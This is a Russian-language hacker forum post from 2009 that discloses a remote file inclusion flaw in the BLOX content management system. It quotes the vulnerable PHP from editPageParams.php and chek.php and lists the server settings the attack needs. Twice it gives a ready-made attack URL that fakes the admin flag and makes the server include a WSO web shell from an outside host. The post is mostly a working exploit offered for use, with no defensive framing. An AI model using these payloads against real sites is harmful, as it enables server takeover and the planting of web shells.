26.12.2009, 01:39
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Update! Post: #127
RFI
Need: register_globals = ON allow_url_include = ON
File: /BLOX/scripts/editPageParams.php
раньше была скуля,теперь там rfi 
PHP код:
if (!$GLOBALS['user']['userIsAdmin'])
return;
QS($K, $B, $terms);
function QS($K, $B, $terms)
{
require_once $GLOBALS['bloxDir'] . "/functions/getPageParams.php";
if (empty($_SESSION['page']))
$pageId = $_GET['page'];
else
$pageId = $_SESSION['page'];
$pageParams = WA($pageId);
require_once $GLOBALS['bloxDir'] . "/functions/Proposition.php";
$H = new S('pageIsHidden', $pageId);
$pageParams['pageIsHidden'] = $H->O();
$H = new S('parentPageIsAdopted', $pageId);
if ($H->O()) {
$pageParams['parentPageIsAdopted'] = true;
$_SESSION['parentPageIsAdopted'] = true;
}
$B->C('pageParams', $pageParams);
include $GLOBALS['bloxDir'] . "/includes/submitButtons.php";
include $GLOBALS['bloxDir'] . "/includes/display.php";
} ?>
Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?
File: /BLOX/script/chek.php
PHP код:
if (!$GLOBALS['user']['userIsAdmin'])
return;
LW($K, $B, $terms);
function LW($K, $B, $terms)
{
require_once $GLOBALS['bloxDir'] . "/functions/getBlockParams.php";
...
Target: ?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php? |
|
|